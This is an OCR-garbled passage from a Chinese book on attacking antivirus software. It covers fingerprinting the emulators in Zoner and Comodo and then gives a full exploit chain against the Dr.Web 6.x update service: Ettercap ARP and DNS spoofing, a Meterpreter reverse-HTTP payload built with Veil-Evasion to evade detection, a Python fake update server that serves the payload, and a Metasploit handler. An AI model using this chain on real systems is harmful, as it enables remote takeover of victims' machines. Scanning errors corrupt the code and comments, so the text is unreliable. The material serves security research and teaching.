
5. 确定 反 病 毒 产 品 支 持 什 么 

确定 反 病 毒 产 品 支持 的 模拟 器 和 解释 器 非常 重要 ,但 是 我 们 有 更 便捷 的 途径 来 完成 这 项 任 
务 。 通 常 来 说 , 如 果 模 拟 器 不 是 由 插件 (通常 会 被 加 密 和 压缩 ) 动 态 加 载 的 话 , 我 们 可 以 借助 grep 
工具 来 查找 模拟 器 相关 的 特征 和 字符 串 。 比 如 ， 要 确定 Zoner Antivirus Linux 版 支持 什么 本 机 代码 
模拟 器 ， 可 以 使 用 以 下 命令 : 

$ LANG=C grep emu -r /opt/zav/ 


Binary file /opt/zav/bin/zavcli matches 
Binary file /opt/zav/lib/zavcore.so matches 


如 果 Zoner AntiVirus 存 在 模拟 需 , 那么 肯定 位 于 zavcli 或 zavcore.so 中 。 因为 这 类 模块 的 实现 代 
人 码 通 常 存在 于 库 文件 中 。 下 面 就 使 用 逆向 分 析 工 具 Radare2 列 出 所 有 位 于 库 文件 zavcore.so 中 的 调 
试 符 号 ， 并 筛选 出 其 中 与 模拟 器 相关 的 符号 ; 


$ rabin2 -s /opt/zav/lib/zavcore.so | egrep "(emu|VM)" 
vaddr-z0x00092600 paddrz0x00078600 ord-525 fwdzNONE sz-419 bind-LOCAL 
type-FUNC 

name- ZL17PeInstrInvalidateP9 PE VMCTXP10 PE THREADjP10X86 DISASMjPP12 
PE JITBLOCKPPhj 

jij.clone.0 

vaddr-z0x00198640 paddr-z0x0017e640 ord=622 fwdzNONE sz-80 bind-LOCAL 
type-OBJECT name- ZL7g JitVM 

f essai) 

vaddr-z0x000f7aa0 paddrz0x000ddaa0 ord-773 fwdzNONE sz-84 bind-LOCAL 
type-OBJECT name- ZZN5RarVM16IsStandardFilterEPhiEA4C.25 
vaddr-z0x000f7a80 paddr-0x000dda80 ord-774 fwdzNONE sz-16 bind-LOCAL 
type-OBJECT name- ZZN5RarVM21ExecuteStandardFilterE18VM StandardFilters 
E5Masks 


初步 看 来 ，Zoner AntiVirus 中 存在 某 种 针对 PE 文件 的 虚拟 机 ( PE_VMcTX， 意 思 是 PE 虚拟 机 
环境 ) 和 针对 压缩 文件 RAR 的 虚拟 机 一 一 RAR VM。 如 果 打 算 挖 气 Zoner AntiVirus 中 的 漏洞 并 进 
行 利用 的 话 , 这 类 信息 有 助 于 帮助 我 们 了 解 其 中 有 哪些 虚拟 机 可 以 作为 目标 。 如果 查找 与 脚本 引 
擎 相关 的 信息 ， 会 发 现 并 没有 找到 相关 结 

$ rabin2 -s /opt/zav/lib/zavcore.so | egrep -i "(vbljavalscript)" 


像 上 述 这 样 没有 返回 任何 有 价值 信息 的 搜索 ， 并 不 意味 着 反 病 毒 产 品 中 不 存在 相关 功能 特 
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性 ,而 是 用 于 查找 的 字符 串 特征 有 遗漏 。 我 们 需要 确定 查找 不 到 的 功能 即便 是 在 被 加 密 或 压缩 的 
反 病 毒 搬 件 中 也 不 存在 , 这 样 才能 得 出 反 病 毒 产 品 不 支持 此 类 文件 的 模拟 的 结论 。 如 果 我 们 研究 
一 下 Comodo 这 样 的 支持 此 类 模拟 操作 的 反 病 毒 产 品 ， 会 得 到 一 个 完全 不 同 的 输出 结 


$ LANG=C grep jscript -r * 

Binary file libSCRIPTENGINE.so matches 

结果 显示 ， 根 据 名 称 匹配 到 了 库 文 件 libSCRIPTENGINE.so。 如 果 使 用 Radare2 中 命令 行 工 具 

rabin2 分 析 该 库 文件 ， 会 看 到 一 系列 显示 脚本 引擎 支持 特性 的 调试 符号 : 

$ rabin2 -s libSCRIPTENGINE.so | egrep -i "(jslvb)" | more 

vaddr-20x000c2943 paddr-z0x00067c33 ord=083 fwd=NONE sz-2327 bind-LOCAL 

type-FUNC name- GLOBAL I JsObjectMethod.cpp 

vaddr-0x000c6508 paddr-0x0006bdf8 ord=086 fwdzNONE sz-43 bind-LOCAL 

type-FUNC name- GLOBAL I JsParseSynate.cpp 

vaddr-z0x001009e0 paddr=0x000a5cd0 ord=099 fwdzNONE sz-200 bind-LOCAL 
type-OBJECT name- ZL9js arrays 

vaddrz0x000dc033 paddr-0x00081323 ord-108 fwd-zNONE sz-270 bind-LOCAL 
type-FUNC name- GLOBAL I  JsGlobalVar.cpp 
uem 

vaddrz0x00325750 paddr-0x002caaa0 ord-221 fwdzNONE sz-40 bind-UNKNOWN 
type-OBJECT name- ZTV9CVbBelowE 
[ erster) 

vaddrz0x000e7664 paddr-0x0008c954 ord-225 fwd=NONE sz-19 bind-UNKNOWN 

type-FUNC name- ZN13CVbIntegerDivDlEv 


Comodo Antivirus 支 持 JavaScript 和 VBScript 的 模拟 ， 这 也 意味 着 攻击 者 可 以 使 用 脚本 引擎 支 
持 的 这 两 种 语言 之 一 来 编写 漏洞 利用 程序 。 

6. 发 布 最 终 版 payload 

前 面 一 节 重 点 阐释 了 在 确定 支持 的 模拟 器 或 解释 器 后 如 何 编写 payload, 以 及 如 何 借助 档案 文 
件 完成 一 次 多 阶段 的 漏洞 利用 攻击 等 。 针对 目标 反 病 毒 软件 编写 完成 payload 之 后 , 该 做 什么 来 完 
成 漏洞 利用 攻击 的 最 后 一 步 呢 ?这 里 并 不 能 通过 简单 的 两 三 句 话 来 回答 。 这 在 很 大 程度 上 取决 于 
对 应 的 模拟 器 和 人 解释 器 ， 因 为 传递 JavaScript 或 VBScript 编 写 的 payload 和 要 被 模拟 的 PE 文件 的 途 
径 是 完全 不 同 的 。 在 任何 情况 下 ， 以 下 规则 都 有 效 : 
口 反 病 毒 软件 会 分 析 所 有 下 载 到 磁盘 的 内 容 ; 
口 反 病毒 软件 会 分 析 所 有 在 程序 执行 过 程 中 运行 或 求 值 的 新 内 容 ; 
口 扫描 程序 会 检查 所 有 下 载 到 磁盘 的 新 文件 或 缓冲 区 内 容 ， 以 及 程序 运行 期 间 的 相关 评估 
操作 。 

这 就 意味 着 ， 比 如 ， 如 果 我 们 要 创建 一 个 用 Intel x86 汇 编 语言 编写 的 payload， 只 要 创建 一 个 文 
件 , 将 缓冲 区 内 容 写 入 文件 ,然后 关闭 它 。 这 一 过 程 会 自动 被 反 病毒 软件 处 理 ， 同 时 对 新 创建 的 组 
冲 区 进行 扫描 。 对 于 JavaScript 或 VBScript 模 拟 来 说 ， 只 要 使 用 eval () 就 能 触发 模拟 器 模拟 。 反 病 
毒 软件 通常 会 hook 函 数 eval () 来 进行 相关 特征 匹配 ， 或 使 用 其 他 种 类 的 扫描 来 侦 测 新 创建 的 缓冲 
区 中 是 否 存 在 恶意 代码 。 比 如 ， 当 我 们 查看 Comodo Antivirus 中 的 库 文件 libSCRIPTENGINE.so 时 会 
发 现 以 下 字符 串 : 
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.rodata:00000000000A7438 ; char aFoundVirus[] 

.rodata:00000000000A7438 46 6F 75 6E 64 20 56 69-«aFoundVirus db 

'Found Virus!',0 ; DATA XREF: eval(CParamsHelper &)4C5o 
.rodata:00000000000A7445 00 00 00 00 00 00 00 00+ align 10h 


MRITA FITR CDS o6 SCIL AETR, fxfXdESIKLeval(CParamsHelper 
&amp;): 














.text:00082F03 mov edi, 8 ; unsigned _ int64 
.text:00082F08 call . Znwrm ; Operator new(ulong) 
.text:00082F0D lea rsi, aFoundVirus ; "Found Virus!" 
.text:00082F14 mov rdi, rax 4 this 

.text:00082F17 mov rbx, rax 

; CJsStopRunException::CJsStopRunException(char *) 
.text:00082F1A call . ZN19CJsStopRunExceptionC1EPc 
text:00082F1F jmp short loc 82F34 


如 你 所 见 ， 每 次 调用 JavaScript 函 数 sval,， 反 病毒 软件 就 会 扫 摘 一 次 缓冲 区 。 如 果 有 所 发 现 ， 
JavaScript 解 释 器 会 终止 执行 。 因此, 只 要 调用 eval 函 数 , 就 可 以 针对 Comodo Antivirus 开 展 攻击 。 
依据 我 的 相关 经 验 来 看 ， 反 病毒 软件 对 eval 函数 进行 hook 十 分 常见 。 这 一 信息 对 于 漏洞 利用 攻 
击 程序 的 编写 十 分 有 用 。 


15.1.4 “利用 更 新 服务 中 的 漏洞 


反 病 毒 软件 客户 端 中 容易 存在 漏洞 的 一 个 部 分 是 更 新 服务 。 利用 更 新 服务 中 的 漏洞 与 利用 其 
他 客户 端 模 块 ， 比 如 文件 格式 解析 器 中 的 普通 内 存 破坏 漏洞 ， 有 着 很 大 的 区 别 。 针 对 更 新 服务 的 
攻击 意味 着 ,服务 器 与 客户 端的 通信 会 被 截取 。 在 局 域 网 内 ， 这 类 截取 可 以 通过 ARP (Address 
Resolution Protocol， 地 址 解析 协议 ) 伪造 实现 。 

ARP 伪 造 或 ARP 投 毒 ， 是 攻击 者 在 局 域 网 内 通过 发 送 伪造 的 ARP 响 应 进行 的 攻击 。 伪 造 ARP 
的 响应 将 攻击 者 的 MAC 地 址 和 目标 主机 卫 地 址 关联 ， 以 此 来 截获 目标 机 器 与 服务 器 之 间 的 通信 。 
这 样 一 来 , 由 于 所 有 流量 都 会 经 过 攻击 者 控制 的 机 器 , 就 可 以 修改 从 特定 反 病 毒 更 新 服务 器 传送 
给 客户 端 机 器 的 更 新 网 络 数 据 包 了 。 如 果 反 病毒 软件 的 更 新 服务 没有 校 验 接收 到 的 更 新 数据 的 
话 ， 结 果 将 是 灾难 性 的 。 

在 查找 更 新 服务 中 潜在 漏洞 的 过 程 中 ， 我 们 首先 需要 回答 以 下 问题 。 
口 更 新 服务 使 用 了 SSL 或 TLS 了 吗 ? 
口 更 新 服务 是 否 验 证 了 服务 器 端的 证 书 ? 
口 更 新 是 否 经 过 签名 ? 
口 更 新 服务 是 否 验 证 了 签名 ? 
a 更 新 服务 是 否 使 用 了 允许 绕 过 签名 检查 的 库 文件 ? 

在 编写 漏洞 利用 程序 的 过 程 中 , 我 分 析 的 反 病 毒 软件 几乎 都 使 用 HTTP 形 式 、 没有 SSL 或 TLS 
加 密 的 纯 文 本 通信 进行 更 新 。 使 用 纯 文本 通信 意味 着 服务 器 发 送 给 客户 端的 所 有 信息 都 可 以 被 暗 
中 修改 。 在 极 少 数 情 况 下 ， 反 病毒 软件 更 新 服务 使 用 SSL/TLS 作 为 唯一 的 通信 手段 ， 不 过 没有 校 
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验 与 客户 端 通信 的 服务 器 是 否 是 真实 的 更 新 服务 器 。 此 外 , 你 可 








能 会 对 更 新 是 否 被 校 验 存在 疑虑 。 








此 处 的 “ 校 验 ” 是 指 更 新 服务 校 验 更 新 文件 是 否 由 反 病 毒 软 件 生成 , 在 传输 过 程 中 是 否 被 修改 过 。 
一 般 会 通过 对 更 新 文件 进行 签名 来 完成 校 验 过 程 ( 比如 ， 使 用 RSA )。 














对 攻击 者 来 说 幸运 的 是 , 大 多 反 病 毒 产品 出 于 检查 更 新 文件 是 否 在 传输 过 程 中 被 蔡 换 修改 的 
目的 , 仅 通过 CRC 或 其 他 类 似 MD5 这 样 的 加 密 散 列 来 校 验 其 更 新 文件 , 除 此 以 外 就 没有 其 他 任何 
操作 了 。 攻击 者 可 以 发 送 与 更 新 文件 一 致 的 正确 CRC 或 MD5 散 列 值 文件 。 最 后 ,即便 更 新 服务 校 
验 了 更 新 文件 的 签名 , 但 如 果 其 使 用 的 是 旧版 本 的 OpenSSL,， 攻击 者 仍 可 以 发 送 经 过 非法 签名 的 
更 新 文件 。 由 于 存在 漏洞 ， 反 病毒 软件 的 签名 校 验 仍 会 通过 。 下 面 是 有 关 OpenSSL 的 























CVE-2008-5077 漏 洞 摘要 : 








在 调用 函数 EVP_VerifyFinal 后 ，OpenSSL 用 到 的 若干 函数 允许 一 个 畸 
形 的 签名 被 当 作 合法 签名 处 理 ， 而 不 是 抛 出 一 个 错误 。 该 问题 影响 到 SSL/TLS 
使 用 的 DSA 和 ECDSA 密 钥 签 名 检查 服务 。 拥 有 恶意 服务 器 的 远程 攻击 者 ， 或 
者 能 够 利用 密 钥 链 生 成 的 畸形 SSL/TLS 证 书 执行 中 间 人 攻击 的 远程 攻击 者 ， 都 


能 够 成 功利 用 该 缺陷 绕 过 相关 校 验 。 


上 述 信息 意味 着 任何 使 用 了 OpenSSL 0.9.8 以 下 版 本 的 程序 
编写 针对 更 新 服务 漏洞 的 利用 程序 


， 都 会 受到 此 漏洞 的 影响 。 


本 节 会 在 Linux 和 Windows 系 统 下 ， 简 单 分 析 针 对 反 病 毒 软件 Dr.Web 的 更 新 服务 编写 的 漏洞 





利用 程序 。6.X 版 本 的 Dr.Web 曾 经 通过 纯 HTTP 协 议 更 新 其 相关 模块 ,而 校 验 更 新 文件 的 唯一 方式 





是 使 用 简单 校 验 技术 CRC 算 法 。 由 于 Dr.Web 这 样 的 设计 , 能 利用 其 更 新 服务 的 漏洞 进行 攻击 就 没 


有 什么 出 人 意料 的 了 。 


Dr Web 反 病毒 软件 曾经 会 从 硬 编码 的 一 系列 HTTP 服 务 顺 地 址 下 载 更 新 文件 : 


口 update.geo.drweb.com 
口 update.drweb.com 

口 update.msk.drweb.com 
口 update.us.drweb.com 

0 update.msk5.drweb.com 
0 update.msk6.drweb.com 
DQ update.frl.drweb.com 
LJ update.usl.drweb.com 
0 update.kz.drweb.com 

DQ update.nsk1.drweb.com 





在 局 域 网 内 , 针对 上 述 域名 进行 ARP 伪 造 和 DNS 投 毒 攻击 , 攻击 者 可 以 将 从 DrWeb 客 户 端 获 
取 下 载 的 更 新 文件 蔡 换 成 自己 的 恶意 文件 。 更 新 服务 首先 从 上 述 网 址 列表 中 选择 一 台 更 新 服务 

















需 ， 然 后 下 载 一 个 带 有 时 间 戳 的 文件 ， 来 确定 是 否 有 新 的 更 新 可 供 下 载 : 
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HTTP Request: 

GET /x64/600/av/windows/timestamp 

HTTP/1.1 Accept: */* 

Host: update.drweb.com 

X-DrWeb-Validate: 259e9b92fa0999398198db382c106f95 
X-DrWeb-KeyNumber: 0110258647 

X-DrWeb-SysHash: E2E8203CB505AE00939EEC9C1D58DOE4 
User-Agent: DrWebUpdate-6.00.15.06220 (windows: 6.01.7601) 
Connection: Keep-Alive 

Cache-Control: no-cache 


HTTP Response: 

HTTP/1.1 200 OK 

Server: nginx/42 Date: Sat, 19 Apr 2014 10:33:36 GMT 
Content-Type: application/octet-stream 
Content-Length: 10 

Last-Modified: Sat, 19 Apr 2014 09:26:19 GMT 
Connection: keep-alive 

Accept-Ranges: bytes 





1397898695 
返回 的 数值 是 一 个 Unix 时 间 戳 ， 显 示 的 是 上 次 更 新 的 时 间 。 在 此 操作 之 后 , 更 新 服务 会 确定 
当前 在 drweb32.flg 中 存储 的 产品 版 本 号 : 


HTTP Request: 

GET /x64/600/av/windows/drweb32.flg HTTP/1.1 

Accept: */* 

Host: update.drweb.com 

X-DrWeb-Validate: 259e9b92fa0999398198db382c106f95 
X-DrWeb-KeyNumber: 0110258647 

X-DrWeb-SysHash: E2E8203CB505AE00939EEC9C1D58DOEA 
User-Agent: DrWebUpdate-6.00.15.06220 (windows: 6.01.7601) 
Connection: Keep-Alive 

Cache-Control: no-cache 








HTTP Response: 

HTTP/1.1 200 OK 

Server: nginx/42 Date: Sat, 19 Apr 2014 10:33:37 GMT 
Content-Type: application/octet-stream 

Content-Length: 336 Last-Modified: Wed, 23 Jan 2013 09:42:21 GMT 
Connection: keep-alive 

Accept-Ranges: bytes [windows] 


LinkNews-http://news.drweb.com/flag-«-800/ 
LinkDownload-http://download.geo.drweb.com/pub/drweb/windows/8.0/ 
drweb-800-win.exe 

FileName- 

isTime-1 

TimeX-1420122293 

cmdLine- 

Type-1 

ExcludeOS-2k|xp64 

ExcludeDwl-ja 
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ExcludeLCID-17|1041 

[signature] 
Sign-7077D2333EA900BCF30E479818E53447CA388597B3AC20B7B0471225FDE69066E8A 
C4C291F364077 


如 你 所 见 , 上 述 响应 中 包含 了 产品 最 新 版 本 的 下 载 链接 , 以 及 排除 于 本 次 更 新 之 外 的 系统 等 。 
更 新 协议 最 有 趣 的 部 分 出 现 了 : 从 Dr Web 请 求 下 载 一 个 包含 所 有 待 更 新 文件 的 经 过 LZMA 压 
缩 的 目录 文件 。 


GET /x64/600/av/windows/drweb32.1st.lzma HTTP / 1.1 
Accept: * / * 

Host: update.drweb.com 

X-DrWeb-Validate: 259e9p92fa099939d198dbd82c106f95 
X-DrWeb-KeyNumber: 0110258647 

X-DrWeb-SysHash: E2E8203CB505AE00939EEC9C1D58DOEA 
User-Agent: DrWebUpdate-6.00.15.06220 (windows: 6.01.7601) 
Connection: Keep-Alive Cache-Control: no-cache 











HTTP / 1.1 200 OK 

Server: nginx / 42 

Date: Sat, 19 Apr 2014 10:33:39 GMT 
Content-Type: application / octet-stream 
Content-Length: 2373 

Last-Modified: Sat, 19 Apr 2014 10:23:08 GMT 
Connection: keep-alive 

Accept-Ranges: bytes 





(...binary data...) 
LZMA 压 缩 文件 内 部 结构 类 似 下 面 这 样 : 


[DrWebUpdateList] 

[500] 

«timestamp, 8D17F12F 
-xlang.lst, EDCB0715 
-rupdate.drl, AB6FA8BE 
-drwebupw.exe, 8C879982 
*drweb32.dll, B73749FD 
-drwebase.vdb, C5CBA22F 


+<wnt>%SYSDIR64%\drivers\dwprot.sys, 3143EB8D 
-«wnt»£CommonProgramFiles£NDoctor WebNScanning EngineNdwengine.exe, 
8097D92B 

-«wnt»£CommonProgramFiles£NDoctor WebNScanning EngineNdwinctl.dll, 
Al8AEAA4A 


[DrWebUpdateListEnd] 

上 述 列表 包含 了 所 有 可 以 更 新 的 文件 。 在 所 有 文件 名 后 面 都 带 了 一 串 类 似 “ 散 列 值 ”一 样 的 
东西 。 这 里 存在 的 问题 是 : 这 里 的 “ 散 列 值 ” 不 是 签名 ， 而 是 一 个 简单 CRC。 得 到 这 些 信息 后 ， 
现在 有 两 种 方式 可 以 发 起 攻击 : 

口 LZMA 压 缩 目录 文件 被 下 载 到 电脑 上 后 , 对 其 进行 修改 , 使 带 有 合法 CRC 值 的 伪造 模块 可 

以 被 安装 到 系统 中 
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口 修改 目录 中 的 一 个 文件 ， 向 其 添加 我 们 编写 的 payload， 然 后 借助 CRC 补 偿 攻 击 让 修改 过 
的 文件 CRC 和 原来 的 保持 一 致 。 

第 一 种 方式 更 灵活 ， 有 更 高 的 可 控 性 ， 而 第 二 种 方式 更 为 复杂 且 没 有 必要 使 用 。 如 果 确 定 要 
使 用 第 一 种 攻击 方式 的 话 ， 可 以 不 用 考虑 想 要 安装 文件 的 CRC 是 否 在 LZMA 压 缩 目 录 文 件 中 。 这 
里 需要 注意 的 是 , 使 用 这 种 方式 不 仅 能 够 将 相关 文件 部 署 到 DrWeb 的 安装 目录 中 去 : 而 且 无 论 对 
于 Linux 还 是 Windows， 我 们 都 可 以 将 任意 文件 写 入 目标 机 器 上 的 任意 位 置 。 

目录 被 下 载 后 , 会 对 目录 中 的 文件 进行 校 验 ， 以 确保 CRC 匹 配 。 更 新 服务 下 载 CRC 校 验 结果 
显示 不 同 的 文件 ， 然 后 将 其 安装 到 目标 机 器 上 。 在 Linux 系 统 中 ， 会 下 载 每 个 独立 的 文件 ; 在 
Windows 系 统 中 ， 会 下 载 差 量 更 新 文件 。 下 载 差 量 更 新 文件 的 HTTP 请 求 如 下 : 

GET /x64/600/av/windows/drwebupw.exe.patch 8c879982 fd933b5f 

如 果 文 件 不 存在 ，Dr Web 会 尝试 下 载 新 版 本 的 完整 安装 程序 : 

GET /x64/600/av/windows/drwebupw.exe 

以 下 是 攻击 DrWeb 更 新 服务 的 具体 步骤 。 

(1) 针对 局 域 网 内 的 机 融 发 起 中 间 人 支持 攻击 。 在 广域网 中 ,也 能 进行 此 类 攻击 , 不 过 这 
不 在 本 书 的 讨论 范围 内 。 

(2) 借助 开源 工具 Ettercap 可 以 发 起 ARP 伪 造 和 DNS 伪造 攻击 ， 截 取 客 户 端 与 之 前 提 到 
的 若干 更 新 服务 器 之 间 的 连接 请 求 流量 。 

(3) 在 我 们 的 机 器 上 使 用 Python 创建 一 个 伪造 的 DrWeb 更 新 服务 器 。 

(4) 当 存 在 缺陷 的 DrWeb 向 我 们 伪造 的 更 新 服务 器 请 求 下载 更 新 文件 的 时 候 ， 提 供 一 个 
Meterpreter ( 和 Metasploit 相 兼容 的 工具 ) 可 执行 文件 来 替代 真正 的 更 新 文件 。 

使 用 Veil-Evasion 创 建 可 以 绕 过 反 病 毒 软件 侦 测 的 Meterpreter payload ， 过 程 如 下 : 





















































Veil-Evasion | [Version]: 2.7.0 


[Web]: https://www.veil-framework.com/ | [Twitter]: GVeilFramework 


Main Menu 


29 payloads loaded 


Available commands: 


use use a specific payload 

info information on a specific payload 
list list available payloads 

update update Veil to the latest version 
clean clean out payload folders 

checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


[»] Please enter a command: list 
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[*] Available payloads: 


1) auxiliary/coldwar. wrapper 
2) auxiliary/pyinstaller wrapper 
3) c/meterpreter/rev http 
esed 
29) python/shellcode inject/pidinject 


»] Please enter a command: use 3 

[»] Please enter a command: set LHOST target-ip 

[»] Please enter a command: generate 

[»] Please enter the base name for output files: drwebupw 

[*] Executable written to: /root/veil-output/compiled/drwebupw.exe 


接 下 来 使 用 Ettercap 发 起 ARP 伪 造 攻 击 ， Md d 了 DNS 伪造 攻击 的 相关 模块 。 在 基于 
Debian 的 Linux 系 统 上 ，Ettercap 可 以 通过 以 下 命令 安 


[ 
> 
> 
> 











$ sudo apt-get install ettercap-graphical 

安装 完成 后 ， 以 超级 用 户 身 份 在 terminal 运 行 Ettercap: 

$ sudo ettercap -G 

-G 标 志 可 以 让 工具 以 GUI 方 式 运行 , 这 样 比 使 用 文本 界面 或 使 用 带 一 长 串 标志 的 命令 更 容易 

。 在 Ettercap GUI 的 菜单 中 ， 按 顺序 选择 Sniff — Unified Sniffing， 选 择 合 适 的 网 卡 ， 然 后 点 击 
OK。 接 着 选择 Hosts ^ Scan 扫 描 Host。 工具 会 扫描 局 域 网 中 与 已 选择 网 卡 对 应 的 host。 回 到 菜单 ， 
选择 Hosts 一 Hosts Lists， 然 后 选择 合适 的 目标 ( 第 一 个 是 网 络 路 由 器 ， 第 二 个 是 运行 着 Dr.Web 
的 目标 机 器 ), 现在 点 击 Mitm > ARP poisoning, 查看 Sniff Remote Connections 选 项 , 然后 点 击 OK。 
接着 ,我 们 需要 编辑 文件 etter.dns ， 向 其 中 添加 想 要 伪造 的 DNS 实体 。( 在 Ubuntu 系统 中 ,文件 位 
于 /etc/ettercap/etter.dns。 ) 














drweb.com A your-own-ip 
*.drweb.com A your-own-ip 


编辑 并 保存 文件 后 , 回 到 Ettercap GUI, 点 击 Plugins ^ Manage Plugins, 双击 显示 在 dns_spoof 
上 的 列表 。 现 在 就 成 功 实施 了 DNS 伪造 ， 所 有 查询 *.drweb.com 域 名 DNS 记录 的 请 求 都 会 返回 我 
们 自己 的 下地 址 。 现 在 ， 到 了 利用 DrWeb 更 新 服务 的 最 后 一 步 ， 使 用 http:/habrahabrru 博 客 作者 
用 Python 编写 的 漏洞 利用 程序 


d!/usr/bin/python 
dencoding: utf-8 














import SocketServer 
import SimpleHTTPServer 
import time 

import lzma 

import os 

import binascii 


from struct import * 
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from subprocess import call 


# HenocpencrBeHHo o6paG6oTvuuk http sanpocoB om KuueuHmra Dr.Web 


class HttpRequestHandler (SimpleHTTPServer.SimpleHTTPRequestHandler): 
def do GET(self): 


if 'timestamp' in self.path: 
self.send response(200) 
self.end headers() 
self.wfile.write(open('timestamp').read()) 


elif 'drweb32.flg' in self.path: 
self.send response(200) 
self.end headers() 
self.wfile.write(open('drweb32.flg').read()) 


elif 'drweb32.lst.lzma' in self.path: 
self.send response(200) 
self.end headers() 
self.wfile.write(open('drweb32.1st.lzma').read()) 


elif UPLOAD FILENAME + '.lzma' in self.path: 
self.send response(200) 
self.end headers() 
self.wfile.write(open(UPLOAD FILENAME + '.lzma').read()) 


#KTMeHT nepBoHauadbHo sanpamuBaeT NATY nis oÓHoBABUeroca gana, 
#a ecu He nozyuaemr ero - sanpamnBaeT ban neuukoM 
elif UPLOAD FILENAME + '.patch' in self.path: 
self.send response(404) 
self.end headers() 


else: 
print self.path 


def CRC32 from file(filename): 
buf = open(filename,' 'rb').read() 
buf = (binascii.crc32(buf) & OxFFFFFFFF) 
return "£08X" $ buf 


def create timestamp file(): 

with open('timestamp','w') as f: 

f.write('$s'$int(time.time())) 

def create 1st file(upload filename,upload path): 
upload path MoxeT HnpauHWMaTb: 
HycTHe SHaueHua, UTO SHauMT YTO Dal HaXOIHTCH HOIHOCpeHncTBeHHO 
B H4pekropus Dr.Web 
1460 sHaueHuMs BUNJA «wnt»$SYSDIR64$Ndrivers*, 
«wnt»$£CommonProgramFiles$NDoctor WebNScanning EngineN gu m.m. 


dE dE db db dk 


Crc32 - CRC32 from file(upload filename) 

with open('drweb32.1st','w') as f: 
f.write('[DrWebUpdateList]n') 
f.write('[500]*^n') 


15.1 实施 客户 端 漏洞 利用 攻击 247 





f.write('+%s, %s\n' $ (upload path-«upload filename,crc32)) 
f.write('[DrWebUpdateListEnd]Wn') 


HO KaRKO 商 -TO npkuuHe BCTpoeHHas B Linux ymTWMAuMTa lzma B cosSnaBaeMoM 
þaňjıe He ykaSHBaeT pasMep ncxonHoro dana 
6es sTroro napaMeTrpa Dr.Web oTrkas3BBaeTCa4 npuMMMaTb QaWJIH, IOSTOMy 


de Hb db od 


HpaBAMM pyKaMA 
def edit file size(lzma filename,orig filename): 
file size - os.stat(orig filename).st size 
with open(lzma filename,'r«b') as f: 
f.seek(5) 
bsize = pack('l',file size) 
f.write(bsize) 


dsarpyxaeMBEÁA bal HOJDXeH HaXOIMTCsH B ONHON HaJIKe CO CKpMITOM 
UPLOAD FILENAME - 'drwebupw.exe' 


#cosnaeM MeTKy BPeMeHK 

create timestamp file() 

#cosgaem $a co cnuckoM oÓ6HoBJZseMHX DanoB, JJA yHaKOBKM B lzma 
dcnoyAubsyeM BCTPoeHHYIO yTMWJMTy 

Create let file(UPLOAD FILENAME.'') 

call(['lzma', '-k', '-f','drweb32.1st']) 

edit file size('drweb32.1lst.lzma','drweb32.1lst') 

#apxnBsnpyem oai c óeXukxoBBM oÓHoBIeHueM 

call(['lzma', '-k', '-f',UPLOAD FILENAME]) 

edit file size(UOLOAD FILENAME + '.lzme',UPLOAD FILENAME) 


print 'Http Server started...' 
httpServer-SocketServer.TCPServer(('',80),HttpRequestHandler) 
httpServer.serve forever() 


尽管 注释 是 俄语 ,但 是 Python 代码 部 分 很 好 理解 : 伪造 DrWeb 的 更 新 协议 ， 并 返回 修改 过 的 
更 新 文件 和 使 用 Linux 上 LZMA 工 具 打 包 的 LZMA 压 缩 目 录 文 件 。 如 果 运 行 该 脚本 ， 并 尝试 更 新 
DrWeb 反 病毒 软件 ， 会 看 到 如 下 请 求 : 


$ python drweb http server.py 
Http Server started... 





























10.0.1.102 - - [20/Apr/2014 10:48:24] "GET 

/x64/600/av/windows/timestamp HTTP/1.1" 200 - 

10.0.1.102 - - [20/Apr/2014 10:48:24] "GET 

/x64/600/av/windows/drweb32.flg HTTP/1.1" 200 - 

10.0.1.102 - - [20/Apr/2014 10:48:26] "GET 

/x64/600/av/windows/drweb32.lst.lzma HTTP/1.1" 200 - 

10.0.1.102 - - [20/Apr/2014 10:48:27] "GET 
/x64/600/av/windows/drwebupw.exe.patch 8c879982 fd933b5f HTTP/1.1" 404 - 15 
10.0.1.102 - - [20/Apr/2014 10:48:27] "GET 





/x64/600/av/windows/drwebupw.exe.lzma HTTP/1.1" 200 - 
在 我 们 的 机 器 上 ， 通 过 以 下 命令 运行 Metasploit 的 反 向 HITP 监 听 : 


$ msfconsole 














msf » use exploit/multi/handler 
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msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse http 
PAYLOAD => windows/meterpreter/reverse http 

msf exploit(handler) » set LHOST target-ip 

LHOST -» target-ip 

msf exploit(handler) » set LPORT 8080 

LPORT => 8080 
msf exploit(handler) » run 








[*] Started HTTP reverse handler on http://target-ip:8080/ 
[*] Starting the payload handler... 


如 果 一 切 顺 利 ， 当 Dr.Web 尝 试 更 新 文件 的 时 候 ， 就 会 将 我 们 创建 的 Meterpreter payload FE 
并 安装 。 接 着 我 们 会 在 Metasploit 控 制 台中 看 到 如 图 15-1 所 示 的 新 session 连 接 。 


) > run 











e handler on http://10.0.1.106:8089/ 
jler... 


ging connection f target /ZYXQ received... 
Yt at offs et 66312 8... 


Patched URL at offs 


Patched C cation Ti neout. at off Se 


Meterpreter se -> 10.0.1.102:1645}) at 2014-04-29 10:50:10 +0700 





meterpreter | 
图 15-1 ”成功 攻破 Dr.Web 


至 此 , 攻击 的 所 有 步 又 全 部 完成 。 正 如 你 所 见 , 针对 存在 类 似 漏洞 的 反 病 毒 更 新 服务 编写 利 
用 程序 十 分 简单 平常 。 


15.2 ”服务 器 端的 漏洞 利用 


服务 器 端的 漏洞 利用 是 通过 局 域 网 或 广域网 、 互 联网 等 相连 网 络 ,， 远程 利用 网 络 服务 中 的 漏 
洞 。 服 务 顺 端的 漏洞 利用 可 以 针对 以 下 服务 。 

口 更 新 服务 ”用 于 检查 反 病 毒 服务 更 新 状态 ， 将 其 下 载 并 安装 到 用 户 计算 机 或 网 络 中 的 
服务 。 

口 管理 控制 台 ”接受 客户 端 机 器 发 送 的 感染 告警 ， 并 交 给 管理 员 处 理 的 控制 台 


口 网 络 服务 ” 反 病 毒 软件 部 署 的 网 络 监听 服务 ， 比 如 : Web 服 务 噩 、 用 于 提供 在 同一 网 络 
内 机 絮 更 新 的 FTP 服 务 器 ， 等 等 。 















































15.2.1 ”客户 端 和 服务 器 端 漏洞 利用 的 区 别 


服务 器 端 漏洞 利用 不 需要 专门 针对 反 病 毒 软件 , 与 客户 端 漏 洞 利用 有 很 大 的 不 同 。 但 是 大 多 
数 探讨 客户 端 漏洞 利用 的 规则 仍然 适用 于 服务 器 端 。 


